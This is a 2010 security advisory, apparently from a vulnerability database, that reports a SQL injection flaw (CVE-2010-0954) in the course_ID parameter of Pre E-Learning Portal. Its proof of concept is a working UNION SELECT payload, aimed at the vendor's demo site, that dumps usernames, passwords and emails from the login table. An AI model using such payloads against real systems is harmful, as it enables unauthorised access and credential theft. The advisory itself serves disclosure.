Topic : | Pre E-Learning Portal SQL Injection Vulnerability
|
SecurityAlert : 7107
CVE : CVE-2010-0954
CWE : CWE-89
SecurityRisk : High (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : NoGe
Published : 11.03.2010
Affected Software : | preprojects:pre_e-learning_portal |
 Advisory Content : ===========================================================================
====================
[o] Pre E-Learning Portal SQL Injection Vulnerability
Software : Pre E-Learning Portal
Vendor : http://www.preproject.com/
Demo : http://www.preprojects.com/elearning/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
===========================================================================
====================
[o] Vulnerable file
search_result.asp [ course_ID ]
[o] Exploit
http://localhost/elearning/search_result.asp?courses=1&course_ID=[SQL]
[o] Proof of concept
http://www.preprojects.com/elearning/search_result.asp?courses=1&course_ID=
194+and+1=0+union+all+select+1,(login%2B':'%2Bpassword%2B':'%2Bemail),3,4,5
,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,
32,33+from+[login]#
u cant see the result?? press ctrl+u and scroll down.. :p
===========================================================================
====================
[o] Greetz
OoN_BoY Paman zxvf Angela Zhang aJe noname
H312Y yooogy mousekill }^-^{ martfella s4va
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
Big Thanks to Vrs-hCk
===========================================================================
====================
References :
http://xforce.iss.net/xforce/xfdb/56729
http://www.securityfocus.com/bid/38582
http://www.packetstormsecurity.com/1003-exploits/preelearningportal-sql.txt
http://secunia.com/advisories/38891
http://osvdb.org/62774
http://evilc0de.blogspot.com/2010/03/pre-e-learning-portal-sql-injection.html
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|